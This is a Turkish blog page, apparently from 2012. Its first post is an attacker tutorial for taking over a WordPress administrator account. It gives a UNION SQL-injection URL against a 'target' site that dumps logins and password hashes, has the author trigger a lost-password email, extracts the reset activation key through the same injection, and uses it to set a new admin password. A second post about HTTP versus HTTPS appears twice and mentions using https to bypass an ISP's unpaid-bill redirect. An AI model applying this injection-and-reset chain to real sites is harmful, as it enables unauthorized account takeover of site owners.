Merhaba bügün size wordpress'de şifre sıfırlamayı anlatacam.
Normalde Wordpress sql injection'da user_login,user_pass kolonlarından bilgileri çekeriz . Ama wordpress şifre algoritması olarak portable php password hashing framework kullandığı için bunu kırmak biraz zordur.
Bu şekilde md5 kırma yerine admin mailine aktivasyon kodu göndererek şifre sıfırlamayı nasıl yaparız.
örneğin ;
http://hedef.com/?p=-99999/**/union/**/select/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from/**/wp_users/*
Şimdi bizim aktivasyon kodunu alabilmemiz için ilk önce şifreyi unuttum deyip admin mailine aktivasyon
kodunu yollatmamız lazım.
http://hedef.com/wp-login.php?action=lostpassword
burdan admin adını yada mailini yazıp aktivasyon kodunu yollamasını istiyoruz.
Ardından user_pass isimli kolon yerine user_activation_key kolonun yazıp aktivasyon kodunu alıyoruz
http://hedef.com/?p=-99999/**/union/**/select/**/concat(0x7c,user_login,0x7c,user_activation_key,0x7c)/**/from/**/wp_users/*
user_login : security
user_activation_key : CDFSAlCsTUvBDUMGHTcd
bu şekilde admin ve şifreyi değiştirmek için işimize yarayacak olan aktivasyon kodunu alıyoruz .
wp-login.php?action=rp&key=[Aktivasyon kodunu buraya ]&login=[Kullanici adinida buraya ]
wp-login.php?action=rp&key=CDFSAlCsTUvBDUMGHTcd&login=security
bu şekilde yaptığımızda yeni şifrenizi yazıp admin olarak giriş yapacaksınız.
Not: Eğer ki aktivasyon kodu yollamadan aktivasyon kodu çekmeye çalışırsanız daha önceden aktivasyon
kodu yollanmadığı için " Can not get Length of 'Column Data' " yazar bunun içinde öncelikle
şifremi unuttum diyip aktivasyon kodunu yollayın.
27.02.2012
17.02.2012
Http ve Https Arasindaki Fark
Merhaba arkadaşlar uzun süredir pek ilgilenmiyorum .İş , okul derken pek zaman kalmıyor.
Bügün size aslında internete her girdiğimizde gördüğümüz ama ne işe yaradığını bilmediğimiz http ve https arasındaki farkı açıklamaya çalışacam .
Https (Hyper Text Transfer Protocol Secure) genel olarak banka sistemleri , kredi kartı ile alışveriş yapılan ve diğer güvenliğine önem veren firmalara tarafından yaygın olarak kullanılır . Çünkü https de giriş yaptığınızda bilgileriniz sizin ve giriş yaptığınız adres tarafından okunabilecek şekilde şifrelenir.Http de ise böyle bir şifreleme yoktur.Sizin giriş yaptığınız verilere başka kişiler ulaşabilir .
Ek olarak eklemek isteyeceğim bir şey daha var .Dün gece Ttnet borcunu ödemeyi unuttuğum için internet bağlanmaya çalıştığım zaman ttnet borç ödeme ekranına yönleniyordu . http://siteadi.com/ diye siteye bağlanmaya çalıştığım zaman ttnet borc ödeme ekranı çıkıyordu .http:// yerine https://siteadi.com/ diye girdiğim zaman ttnet borc ödeme ekranı çıkmadan rahatlıkla internete bağlanabiliyorsunuz .
Bir daha ki sefer görüşmek dileğiyle .
Bügün size aslında internete her girdiğimizde gördüğümüz ama ne işe yaradığını bilmediğimiz http ve https arasındaki farkı açıklamaya çalışacam .
Https (Hyper Text Transfer Protocol Secure) genel olarak banka sistemleri , kredi kartı ile alışveriş yapılan ve diğer güvenliğine önem veren firmalara tarafından yaygın olarak kullanılır . Çünkü https de giriş yaptığınızda bilgileriniz sizin ve giriş yaptığınız adres tarafından okunabilecek şekilde şifrelenir.Http de ise böyle bir şifreleme yoktur.Sizin giriş yaptığınız verilere başka kişiler ulaşabilir .
Ek olarak eklemek isteyeceğim bir şey daha var .Dün gece Ttnet borcunu ödemeyi unuttuğum için internet bağlanmaya çalıştığım zaman ttnet borç ödeme ekranına yönleniyordu . http://siteadi.com/ diye siteye bağlanmaya çalıştığım zaman ttnet borc ödeme ekranı çıkıyordu .http:// yerine https://siteadi.com/ diye girdiğim zaman ttnet borc ödeme ekranı çıkmadan rahatlıkla internete bağlanabiliyorsunuz .
Bir daha ki sefer görüşmek dileğiyle .
Kaydol:
Kayıtlar (Atom)